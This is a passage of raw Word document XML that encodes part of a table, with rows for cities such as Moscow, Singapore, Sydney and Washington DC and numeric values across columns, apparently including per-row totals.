          </w:tcPr>
          <w:p w14:paraId="09184E74"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668</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04866E65"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7023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="5F4ED8B4" w14:textId="77777777" w:rsidTr="001C3F72">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71E1FFE1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06225D31"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514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F5DDD6A"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468</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0429AF"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495</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC01A48"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464</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DBD11CD"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460</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4960B08D"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507</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D61EB37"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477</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5089563A"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477</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FBDC038"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468</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D83F351"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550</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1A557F"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4880</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="2899916C" w14:textId="77777777" w:rsidTr="001C3F72">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6EDC5D0F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16EB0954"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537</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D19F2D"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531</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71D45C02"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459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADAB0AF"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459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B9226F"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455</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036AD5B8"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1083</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34959BB5"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532</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A833A81"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503</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47685934"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464</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="093300C7"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457</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B18074"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5480</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="60B2CB37" w14:textId="77777777" w:rsidTr="001C3F72">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266CA750" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="315B820D"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547</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E990C55"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389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="707AEA06"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368</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3670DD85"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431</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22EEFC2D"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382</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="454D216A"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556</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B07BBE5"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389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C0189C"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390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E7CD90A"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379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="669F093B"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401</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E3209E6"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4232</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="6E0630E3" w14:textId="77777777" w:rsidTr="001C3F72">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462AF730" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7959D017"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679</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0590F287"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534</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B4D560"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569</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486A7D6B"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247</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385A5EE4"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346</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF735AE"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251</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD340C9"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1093</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36691A24"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544</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="791C969D"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527</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CB066F"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499</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
